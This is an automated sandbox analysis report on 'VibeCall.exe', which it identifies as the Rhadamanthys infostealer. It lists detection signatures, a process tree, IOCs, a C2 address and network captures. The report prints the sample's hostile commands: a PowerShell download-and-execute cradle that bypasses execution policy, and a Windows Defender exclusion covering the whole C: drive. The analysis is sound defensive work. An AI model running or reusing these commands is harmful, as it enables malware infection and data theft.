Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VibeCall.exe

Overview

General Information

Sample name:VibeCall.exe
Analysis ID:1627611
MD5:946638e03405c5151c5b4a203fd0e251
SHA1:24f5560acdbd32ea8e9fd3fcbc34f4c62c00d9a1
SHA256:48a2c5750eb3d09f1c9b54becc1b261ce4bb659abecc38bd2bd56e5d20845c9d
Tags:CrazyEvilexeNoLogsMarchuser-g0njxa
Infos:

Detection

RHADAMANTHYS
Score:96
Range:0 - 100
Confidence:100%

Compliance

Score:63
Range:0 - 100

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • VibeCall.exe (PID: 2300 cmdline: "C:\Users\user\Desktop\VibeCall.exe" MD5: 946638E03405C5151C5B4A203FD0E251)
    • powershell.exe (PID: 6840 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7280 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7724 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aisolution_vibecall_a.exe (PID: 8116 cmdline: "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe" MD5: 55AAEC588AB6793DED2D2DFEC06DDD93)
      • fontdrvhost.exe (PID: 2044 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 7748 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 3900 cmdline: C:\Windows\system32\WerFault.exe -u -p 7748 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • contry_solution_vibecall_e.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe" MD5: E94DBC956D2AA25A91FA6D90FDF1AA85)
      • fontdrvhost.exe (PID: 1640 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
      • WerFault.exe (PID: 2176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 2436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • soundsolution_vibecall_c.exe (PID: 2172 cmdline: "C:\Users\user\Downloads\soundsolution_vibecall_c.exe" MD5: CF3B58083031B698CD957B1116AAB575)
    • videosolution_vibecall_b.exe (PID: 5100 cmdline: "C:\Users\user\Downloads\videosolution_vibecall_b.exe" MD5: B9C44C022C8BE3B42AC71FA9DBFA67E1)
      • fontdrvhost.exe (PID: 4520 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 8132 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
      • WerFault.exe (PID: 2164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 376 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000003.2481606661.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000012.00000003.2593226340.0000000003E90000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000012.00000003.2589680228.00000000014B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.3.videosolution_vibecall_b.exe.3e90000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              40.3.fontdrvhost.exe.5510000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                14.3.aisolution_vibecall_a.exe.3ce0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  14.3.aisolution_vibecall_a.exe.3ac0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    14.3.aisolution_vibecall_a.exe.3ce0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 15 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: PowerShell Download and Execution Cradles
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6840, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6840, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6840, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-02T22:00:39.780475+010028033053Unknown Traffic192.168.2.449742188.114.97.380TCP
                      2025-03-02T22:00:44.884103+010028033053Unknown Traffic192.168.2.449743188.114.97.380TCP
                      2025-03-02T22:00:51.837526+010028033053Unknown Traffic192.168.2.449744188.114.97.380TCP
                      2025-03-02T22:00:54.779683+010028033053Unknown Traffic192.168.2.449745172.67.74.15280TCP
                      2025-03-02T22:00:55.342317+010028033053Unknown Traffic192.168.2.449746208.95.112.180TCP
                      2025-03-02T22:00:58.036385+010028033053Unknown Traffic192.168.2.449748188.114.97.380TCP
                      2025-03-02T22:00:58.889075+010028033053Unknown Traffic192.168.2.449749172.67.74.15280TCP
                      2025-03-02T22:00:58.998460+010028033053Unknown Traffic192.168.2.449746208.95.112.180TCP
                      2025-03-02T22:01:05.560959+010028033053Unknown Traffic192.168.2.449753172.67.74.15280TCP
                      2025-03-02T22:01:05.655389+010028033053Unknown Traffic192.168.2.449746208.95.112.180TCP
                      2025-03-02T22:01:12.404733+010028033053Unknown Traffic192.168.2.449779172.67.74.15280TCP
                      2025-03-02T22:01:12.514119+010028033053Unknown Traffic192.168.2.449746208.95.112.180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-02T22:01:33.847363+010028548021Domain Observed Used for C2 Detected171.22.120.2334955192.168.2.449940TCP
                      2025-03-02T22:01:37.305760+010028548021Domain Observed Used for C2 Detected79.141.168.82113192.168.2.449962TCP
                      2025-03-02T22:01:47.451664+010028548021Domain Observed Used for C2 Detected45.129.185.241896192.168.2.450026TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-02T22:00:21.667098+010018100002Potentially Bad Traffic192.168.2.449740104.20.4.235443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Found malware configuration
                      Source: 18.3.videosolution_vibecall_b.exe.1630000.8.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeReversingLabs: Detection: 45%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

                      Compliance

                      barindex
                      PE / OLE file has a valid certificate
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Uses secure TLS version for HTTPS connections
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Contains modern PE file flags such as dynamic base (ASLR) or NX
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Binary contains paths to debug symbols
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp37_2_0000025F79D60511
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp45_2_0000026D37E90511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 171.22.120.233:4955 -> 192.168.2.4:49940
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.129.185.24:1896 -> 192.168.2.4:50026
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 79.141.168.8:2113 -> 192.168.2.4:49962
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Performs DNS queries to domains with low reputation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeDNS query: api.mirrow1-dell.xyz
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49751
                      Source: global trafficTCP traffic: 192.168.2.4:49747 -> 147.45.60.20:5000
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:39 GMTContent-Type: application/octet-streamContent-Length: 17363140Connection: keep-aliveLast-Modified: Thu, 27 Feb 2025 17:17:12 GMTETag: "67c09e18-108f0c4"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0HMuwxEuOi3vwZW6qkqEGscC02vhZbqXecTRp7pMdcRegI3%2BscYHd7c92%2FsePQnZG4KsnQxIOJapnQ8Uf1OUCuR30DCV%2FEX1GD5RriLKjOmNa8C%2Bzh%2F86YFLKn9%2BdT%2BckvqCOruBwQp8pI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d329bed442c6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=85&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:44 GMTContent-Type: application/octet-streamContent-Length: 17235932Connection: keep-aliveLast-Modified: Thu, 27 Feb 2025 17:14:54 GMTETag: "67c09d8e-106ffdc"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xIImTFmc2qe8Px1FdlUE5rCHeV7M%2FrzPOwg6P9lA4%2FWAPcEE3ZR4oGwmb4yu0c2nMuydDouInpwhmqMt%2BN6j%2FmX59y59T4nBwiN%2FBT4%2BNfNFLDWQqyR9S26qYlH%2BXNrBKkIqzj313pCvRk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d349bcd46a53-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=90&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 ea Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*
